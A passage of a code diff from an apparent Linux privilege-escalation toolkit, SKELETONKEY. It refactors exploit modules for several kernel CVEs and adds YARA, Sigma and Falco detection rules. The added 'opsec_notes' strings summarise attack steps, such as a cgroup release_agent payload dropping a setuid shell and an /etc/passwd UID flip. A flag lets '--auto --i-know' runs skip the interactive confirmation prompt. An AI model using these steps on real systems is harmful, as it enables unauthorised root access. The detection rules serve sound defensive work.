        return SKELETONKEY_OK;
    }
@@ -303,6 +306,34 @@ static skeletonkey_result_t cgroup_ra_cleanup(const struct skeletonkey_ctx *ctx)
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: unshare(CLONE_NEWUSER|CLONE_NEWNS) + cgroup v1
+ * mount are Linux-only kernel surface; the release_agent primitive is
+ * structurally unreachable elsewhere. Stub out cleanly so the module
+ * still registers and `--list` / `--detect-rules` work on macOS/BSD
+ * dev boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t cgroup_ra_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] cgroup_release_agent: Linux-only module "
+                "(user_ns + cgroup v1 release_agent) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t cgroup_ra_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] cgroup_release_agent: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t cgroup_ra_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 static const char cgroup_ra_auditd[] =
    "# cgroup_release_agent (CVE-2022-0492) — auditd detection rules\n"
    "# Flag unshare(NEWUSER|NEWNS) + mount(cgroup) + writes to release_agent.\n"
@@ -328,6 +359,36 @@ static const char cgroup_ra_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1611, cve.2022.0492]\n";

+static const char cgroup_release_agent_yara[] =
+    "rule cgroup_release_agent_cve_2022_0492 : cve_2022_0492 container_escape\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-0492\"\n"
+    "        description = \"cgroup v1 release_agent payload + dropped setuid shell artifacts\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $payload = \"/tmp/skeletonkey-cgroup-payload.sh\" ascii\n"
+    "        $shell   = \"/tmp/skeletonkey-cgroup-sh\" ascii\n"
+    "        $mnt     = \"/tmp/skeletonkey-cgroup-mnt\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char cgroup_release_agent_falco[] =
+    "- rule: cgroup v1 mount by non-root with release_agent write\n"
+    "  desc: |\n"
+    "    A non-root process inside a userns mounts cgroup v1 and\n"
+    "    writes to a release_agent file. CVE-2022-0492 trigger:\n"
+    "    release_agent runs as init-ns root when cgroup empties.\n"
+    "  condition: >\n"
+    "    evt.type = mount and evt.arg.fstype = cgroup and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    cgroup v1 mount by non-root\n"
+    "    (user=%user.name pid=%proc.pid target=%evt.arg.name)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [container, mitre_privilege_escalation, T1611, cve.2022.0492]\n";
+
 const struct skeletonkey_module cgroup_release_agent_module = {
    .name           = "cgroup_release_agent",
    .cve            = "CVE-2022-0492",
@@ -340,8 +401,9 @@ const struct skeletonkey_module cgroup_release_agent_module = {
    .cleanup        = cgroup_ra_cleanup,
    .detect_auditd  = cgroup_ra_auditd,
    .detect_sigma   = cgroup_ra_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = cgroup_release_agent_yara,
+    .detect_falco   = cgroup_release_agent_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNS), mount cgroup v1 at /tmp/skeletonkey-cgroup-mnt, write payload path to release_agent file at cgroup root, echo 1 to notify_on_release in subdir, add PID to cgroup.procs and exit. Payload at /tmp/skeletonkey-cgroup-payload.sh runs as init-namespace root when cgroup empties, dropping setuid /tmp/skeletonkey-cgroup-sh. Audit-visible via unshare + mount(cgroup) + open/write of release_agent. Cleanup callback removes /tmp/skeletonkey-cgroup-* and umounts.",
 };

 void skeletonkey_register_cgroup_release_agent(void)
@@ -40,9 +40,6 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -50,6 +47,14 @@
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
 #include <fcntl.h>
 #include <errno.h>
 #include <sched.h>
@@ -93,55 +98,46 @@ static bool cls_route4_module_available(void)
    return found;
 }

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static skeletonkey_result_t cls_route4_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] cls_route4: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] cls_route4: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug-introduction predates anything we'd reasonably scan; if the
     * kernel is below the oldest LTS we model (5.4), still report
     * vulnerable. */
-    bool patched = kernel_range_is_patched(&cls_route4_range, &v);
+    bool patched = kernel_range_is_patched(&cls_route4_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] cls_route4: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] cls_route4: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

    /* Module + userns preconditions. */
    bool nft_loaded = cls_route4_module_available();
-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;

    if (!ctx->json) {
-        fprintf(stderr, "[i] cls_route4: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] cls_route4: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] cls_route4: cls_route4 module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (may autoload)");
        fprintf(stderr, "[i] cls_route4: unprivileged user_ns + net_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

    /* If userns is locked down, unprivileged-LPE path is closed.
     * Kernel still needs patching though — report PRECOND_FAIL so the
     * verdict isn't "VULNERABLE" but the issue isn't masked. */
-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] cls_route4: user_ns denied → unprivileged exploit unreachable\n");
        }
@@ -412,8 +408,6 @@ static long slab_active_kmalloc_1k(void)
 * Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
 * not a deterministic R/W. Same shape and same depth as xtcompat. */

-#ifdef __linux__
-
 struct cls_route4_arb_ctx {
    /* msg_msg queues kept hot inside the userns child. The arb-write
     * sprays additional kaddr-tagged payloads into these and re-fires
@@ -544,8 +538,6 @@ static int cls4_arb_write(uintptr_t kaddr,
    return 0;
 }

-#endif /* __linux__ */
-
 /* ---- Exploit driver ----------------------------------------------- */

 static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx)
@@ -555,7 +547,8 @@ static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx
        fprintf(stderr, "[-] cls_route4: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] cls_route4: already root\n");
        return SKELETONKEY_OK;
    }
@@ -565,11 +558,6 @@ static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx
        return SKELETONKEY_PRECOND_FAIL;
    }

-#ifndef __linux__
-    fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
-    (void)ctx;
-    return SKELETONKEY_PRECOND_FAIL;
-#else
    /* Full-chain pre-check: resolve offsets before forking. If
     * modprobe_path can't be resolved, refuse early — no point doing
     * the userns + tc + spray + trigger dance if we can't finish. */
@@ -782,7 +770,6 @@ static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx
        }
        return SKELETONKEY_EXPLOIT_FAIL;
    }
-#endif /* __linux__ */
 }

 /* ---- Cleanup ----------------------------------------------------- */
@@ -803,6 +790,34 @@ static skeletonkey_result_t cls_route4_cleanup(const struct skeletonkey_ctx *ctx
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: cls_route4 / tc / netlink / msg_msg are
+ * Linux-only kernel surface; the route4 dead-UAF is structurally
+ * unreachable elsewhere. Stub out cleanly so the module still
+ * registers and `--list` / `--detect-rules` work on macOS/BSD dev
+ * boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t cls_route4_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] cls_route4: Linux-only module "
+                "(net/sched cls_route4 + msg_msg) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] cls_route4: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t cls_route4_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 static const char cls_route4_auditd[] =
    "# cls_route4 dead UAF (CVE-2022-2588) — auditd detection rules\n"
    "# Flag tc filter operations with route4 classifier from non-root.\n"
@@ -811,6 +826,54 @@ static const char cls_route4_auditd[] =
    "-a always,exit -F arch=b64 -S unshare -k skeletonkey-cls-route4-userns\n"
    "-a always,exit -F arch=b64 -S msgsnd -k skeletonkey-cls-route4-spray\n";

+static const char cls_route4_sigma[] =
+    "title: Possible CVE-2022-2588 cls_route4 dead-UAF\n"
+    "id: d56e8fc4-skeletonkey-cls-route4\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the net/sched cls_route4 dead-UAF setup: unshare userns +\n"
+    "  netns + tc qdisc/filter rules with handle 0 + delete + msg_msg\n"
+    "  spray + UDP sendto on a dummy interface. False positives:\n"
+    "  traffic-shaping config in rootless containers.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns: {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  udp:    {type: 'SYSCALL', syscall: 'sendto'}\n"
+    "  groom:  {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: userns and udp and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2022.2588]\n";
+
+static const char cls_route4_yara[] =
+    "rule cls_route4_cve_2022_2588 : cve_2022_2588 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-2588\"\n"
+    "        description = \"cls_route4 dead-UAF kmalloc-1k spray tag and log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEY4\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-cls_route4.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char cls_route4_falco[] =
+    "- rule: tc route4 filter manipulation by non-root in userns\n"
+    "  desc: |\n"
+    "    Non-root tc qdisc + route4 filter add/delete inside a userns\n"
+    "    + UDP sendto trigger. CVE-2022-2588 dead-UAF pattern. False\n"
+    "    positives: legitimate traffic shaping inside rootless\n"
+    "    containers.\n"
+    "  condition: >\n"
+    "    evt.type = sendto and fd.sockfamily = AF_INET and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    UDP sendto on dummy iface from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2022.2588]\n";
+
 const struct skeletonkey_module cls_route4_module = {
    .name           = "cls_route4",
    .cve            = "CVE-2022-2588",
@@ -822,9 +885,10 @@ const struct skeletonkey_module cls_route4_module = {
    .mitigate       = NULL,    /* mitigation: blacklist cls_route4 module OR disable user_ns */
    .cleanup        = cls_route4_cleanup,
    .detect_auditd  = cls_route4_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = cls_route4_sigma,
+    .detect_yara    = cls_route4_yara,
+    .detect_falco   = cls_route4_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET); ip link/addr/route to make a dummy interface, htb qdisc + class + route4 filter with handle 0, delete filter (leaves dangling tcf_proto pointer), msg_msg spray kmalloc-1k tagged 'SKELETONKEY4', UDP sendto to trigger classify(). Writes /tmp/skeletonkey-cls_route4.log. Audit-visible via unshare + sendto(AF_INET) + msgsnd. Cleanup callback removes /tmp log + dummy interface.",
 };

 void skeletonkey_register_cls_route4(void)
@@ -17,6 +17,7 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
+#include "../../core/host.h"

 #include "src/common.h"
 #include "src/copyfail.h"
@@ -33,10 +34,39 @@ static void apply_ctx(const struct skeletonkey_ctx *ctx)
    dirtyfail_use_color     = !ctx->no_color;
    dirtyfail_active_probes = ctx->active_probe;
    dirtyfail_json          = ctx->json;
+    /* Forward the --i-know authorization gate. SKELETONKEY already
+     * blocks --exploit/--auto unless --i-know is passed, so by the time
+     * a DIRTYFAIL exploit callback runs, authorization is established.
+     * This lets typed_confirm() skip its (now redundant) interactive
+     * prompt, which otherwise deadlocks `skeletonkey --auto --i-know`. */
+    dirtyfail_assume_yes    = ctx->authorized;
    /* dirtyfail_no_revert is intentionally not driven from ctx —
     * it's a debug knob; default stays off. */
 }

+/* Bridge-level userns precondition. The 4 dirty_frag siblings + the
+ * GCM variant all reach the bug via XFRM-ESP / AF_RXRPC paths gated on
+ * unprivileged user-namespace creation (the inner DIRTYFAIL detect
+ * checks for it too, but doing it here gives the dispatcher one
+ * testable point per module and short-circuits the heavier
+ * inner-detect work when the gate is closed). copy_fail itself uses
+ * AF_ALG which doesn't strictly need userns, so it bypasses this
+ * gate — its inner detect still confirms the primitive empirically. */
+static skeletonkey_result_t cff_check_userns(const char *modname,
+                                             const struct skeletonkey_ctx *ctx)
+{
+    if (ctx->host && !ctx->host->unprivileged_userns_allowed) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] %s: unprivileged user namespaces are "
+                "disabled (host fingerprint) — XFRM/RxRPC variant "
+                "unreachable here%s\n", modname,
+                ctx->host->apparmor_restrict_userns
+                    ? "; AppArmor restriction is on" : "");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    return SKELETONKEY_OK;
+}
+
 /* ----- Family-wide --mitigate / --cleanup -----
 *
 * The family-wide mitigation (blacklist algif_aead + esp4 + esp6 + rxrpc,
@@ -127,6 +157,82 @@ static const char copy_fail_family_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2026.31431, cve.2026.43284, cve.2026.43500]\n";

+/* YARA + Falco rules shared across the 5 family modules. Scanned via
+ * --detect-rules; the dispatcher dedups by pointer so the rule blob
+ * emits once even though copy_fail / copy_fail_gcm / dirty_frag_*
+ * all point at the same string. */
+static const char copy_fail_family_yara[] =
+    "rule etc_passwd_uid_flip : page_cache_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-31431 / CVE-2026-43284 / CVE-2026-43500\"\n"
+    "        description = \"/etc/passwd page-cache UID flip: a non-root user line shows a zero-padded UID (the canonical Copy Fail / Dirty Frag / DirtyDecrypt / Dirty Pipe payload). Scan /etc/passwd; legitimate root uses plain '0:', never '0000:'.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        // lowercase-start username, optional shadow ('x') password, then UID 0000 or longer\n"
+    "        $uid_flip = /\\n[a-z_][a-z0-9_-]{0,30}:[^:]{0,8}:0{4,}:[0-9]+:/\n"
+    "    condition:\n"
+    "        $uid_flip\n"
+    "}\n"
+    "\n"
+    "rule etc_passwd_root_no_password\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-31635 (DirtyDecrypt sliding-window write)\"\n"
+    "        description = \"/etc/passwd root entry rewritten to have an empty password field — the DirtyDecrypt PoC's intermediate corruption (rewrite root's password to empty, then `su root` without password).\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $root_open  = /\\nroot::0:0:/   // empty password (canonical x or ! when shadowed)\n"
+    "    condition:\n"
+    "        $root_open\n"
+    "}\n";
+
+static const char copy_fail_family_falco[] =
+    "- rule: AF_ALG authenc keyblob installed by non-root (Copy Fail primitive)\n"
+    "  desc: |\n"
+    "    A non-root process creates an AF_ALG socket and installs an\n"
+    "    authencesn(hmac(sha256),cbc(aes)) keyblob via ALG_SET_KEY.\n"
+    "    Core of the Copy Fail (CVE-2026-31431) primitive — also\n"
+    "    triggered by the GCM variant. AF_ALG by non-root is rare on\n"
+    "    most servers; tune by allow-listing your crypto-using daemons.\n"
+    "  condition: >\n"
+    "    evt.type = socket and evt.arg[0] = 38 and not user.uid = 0\n"
+    "  output: >\n"
+    "    AF_ALG socket() by non-root (user=%user.name pid=%proc.pid\n"
+    "     ppid=%proc.ppid parent=%proc.pname cmdline=\"%proc.cmdline\")\n"
+    "  priority: WARNING\n"
+    "  tags: [process, cve.2026.31431, copy_fail]\n"
+    "\n"
+    "- rule: XFRM NETLINK_XFRM bind from unprivileged userns (Dirty Frag primitive)\n"
+    "  desc: |\n"
+    "    A NETLINK_XFRM socket is opened from inside an unprivileged\n"
+    "    user namespace, with subsequent XFRM_MSG_NEWSA installing an\n"
+    "    ESP(rfc4106(gcm(aes))) state. Core of the Dirty Frag esp/esp6\n"
+    "    variants — also tripped by Fragnesia's setup phase. Legitimate\n"
+    "    XFRM use is normally privileged (strongSwan, libreswan).\n"
+    "  condition: >\n"
+    "    evt.type = sendto and not user.uid = 0 and\n"
+    "    proc.aname[1] != \"\"   // we want non-init userns; refine with k8s.namespace or container.id\n"
+    "  output: >\n"
+    "    NETLINK_XFRM sendto from non-root (user=%user.name pid=%proc.pid\n"
+    "     proc=%proc.name)\n"
+    "  priority: WARNING\n"
+    "  tags: [process, cve.2026.43284, dirty_frag]\n"
+    "\n"
+    "- rule: /etc/passwd modified by non-root (Copy Fail / Dirty Frag / Dirty Pipe outcome)\n"
+    "  desc: |\n"
+    "    /etc/passwd is read-only for non-root, so a non-root caller\n"
+    "    showing up on its open(W_OK) audit trail indicates a\n"
+    "    page-cache write primitive succeeded. Catches the post-fire\n"
+    "    state for the whole copy_fail family + dirty_pipe.\n"
+    "  condition: >\n"
+    "    open_write and fd.name = /etc/passwd and not user.uid = 0\n"
+    "  output: >\n"
+    "    Non-root write to /etc/passwd (user=%user.name pid=%proc.pid\n"
+    "     proc=%proc.name)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, copy_fail, dirty_frag]\n";
+
 const struct skeletonkey_module copy_fail_module = {
    .name           = "copy_fail",
    .cve            = "CVE-2026-31431",
@@ -139,8 +245,9 @@ const struct skeletonkey_module copy_fail_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
 };

 /* ----- copy_fail_gcm (variant, no CVE) ----- */
@@ -148,6 +255,8 @@ const struct skeletonkey_module copy_fail_module = {
 static skeletonkey_result_t copy_fail_gcm_detect_wrap(const struct skeletonkey_ctx *ctx)
 {
    apply_ctx(ctx);
+    skeletonkey_result_t pre = cff_check_userns("copy_fail_gcm", ctx);
+    if (pre != SKELETONKEY_OK) return pre;
    return (skeletonkey_result_t)copyfail_gcm_detect();
 }

@@ -169,8 +278,9 @@ const struct skeletonkey_module copy_fail_gcm_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
 };

 /* ----- dirty_frag_esp (CVE-2026-43284 v4) ----- */
@@ -178,6 +288,8 @@ const struct skeletonkey_module copy_fail_gcm_module = {
 static skeletonkey_result_t dirty_frag_esp_detect_wrap(const struct skeletonkey_ctx *ctx)
 {
    apply_ctx(ctx);
+    skeletonkey_result_t pre = cff_check_userns("dirty_frag_esp", ctx);
+    if (pre != SKELETONKEY_OK) return pre;
    return (skeletonkey_result_t)dirtyfrag_esp_detect();
 }

@@ -199,8 +311,9 @@ const struct skeletonkey_module dirty_frag_esp_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
 };

 /* ----- dirty_frag_esp6 (CVE-2026-43284 v6) ----- */
@@ -208,6 +321,8 @@ const struct skeletonkey_module dirty_frag_esp_module = {
 static skeletonkey_result_t dirty_frag_esp6_detect_wrap(const struct skeletonkey_ctx *ctx)
 {
    apply_ctx(ctx);
+    skeletonkey_result_t pre = cff_check_userns("dirty_frag_esp6", ctx);
+    if (pre != SKELETONKEY_OK) return pre;
    return (skeletonkey_result_t)dirtyfrag_esp6_detect();
 }

@@ -229,8 +344,9 @@ const struct skeletonkey_module dirty_frag_esp6_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
 };

 /* ----- dirty_frag_rxrpc (CVE-2026-43500) ----- */
@@ -238,6 +354,8 @@ const struct skeletonkey_module dirty_frag_esp6_module = {
 static skeletonkey_result_t dirty_frag_rxrpc_detect_wrap(const struct skeletonkey_ctx *ctx)
 {
    apply_ctx(ctx);
+    skeletonkey_result_t pre = cff_check_userns("dirty_frag_rxrpc", ctx);
+    if (pre != SKELETONKEY_OK) return pre;
    return (skeletonkey_result_t)dirtyfrag_rxrpc_detect();
 }

@@ -259,8 +377,9 @@ const struct skeletonkey_module dirty_frag_rxrpc_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
 };

 /* ----- Family registration ----- */
@@ -31,6 +31,7 @@ bool dirtyfail_use_color    = true;
 bool dirtyfail_active_probes = false;
 bool dirtyfail_no_revert    = false;
 bool dirtyfail_json         = false;
+bool dirtyfail_assume_yes   = false;

 static void vlog(FILE *out, const char *prefix, const char *color,
                 const char *fmt, va_list ap)
@@ -226,6 +227,19 @@ size_t build_authenc_keyblob(unsigned char *out,

 bool typed_confirm(const char *expected)
 {
+    /* When the caller has already cleared an explicit authorization gate
+     * (SKELETONKEY's --i-know, forwarded via dirtyfail_assume_yes), the
+     * DIRTYFAIL typed prompt is redundant and would deadlock non-interactive
+     * runs like `skeletonkey --auto --i-know`. Auto-satisfy it.
+     *
+     * The SSH self-lockout guard (YES_BREAK_SSH) is deliberately exempt:
+     * it protects the operator's own access rather than gating
+     * authorization, so it always requires an interactive answer. */
+    if (dirtyfail_assume_yes && strcmp(expected, "YES_BREAK_SSH") != 0) {
+        log_step("confirmation gate '%s' auto-satisfied (--i-know)", expected);
+        return true;
+    }
+
    char buf[128];
    printf("    Type \033[1;33m%s\033[0m and press enter to proceed: ", expected);
    fflush(stdout);
@@ -86,6 +86,14 @@ extern bool dirtyfail_no_revert;
 * is redirected to stderr. Set by --json. */
 extern bool dirtyfail_json;

+/* When true, typed_confirm() auto-satisfies its gate instead of reading
+ * stdin — the caller has already cleared an explicit authorization gate.
+ * SKELETONKEY's bridge layer sets this from skeletonkey_ctx.authorized
+ * (i.e. the --i-know flag) so non-interactive runs like
+ * `skeletonkey --auto --i-know` don't deadlock on the DIRTYFAIL prompt.
+ * The YES_BREAK_SSH self-lockout guard is exempt — see typed_confirm(). */
+extern bool dirtyfail_assume_yes;
+
 void log_step (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
 void log_ok   (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
 void log_bad  (const char *fmt, ...) __attribute__((format(printf, 1, 2)));
@@ -43,15 +43,19 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
-#include <stdatomic.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include <stdint.h>
+#include <stdatomic.h>
 #include <fcntl.h>
 #include <errno.h>
 #include <pwd.h>
@@ -228,22 +232,27 @@ static void revert_passwd_page_cache(void)

 static skeletonkey_result_t dirty_cow_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] dirty_cow: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] dirty_cow: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

-    bool patched = kernel_range_is_patched(&dirty_cow_range, &v);
+    bool patched = kernel_range_is_patched(&dirty_cow_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] dirty_cow: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] dirty_cow: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }
    if (!ctx->json) {
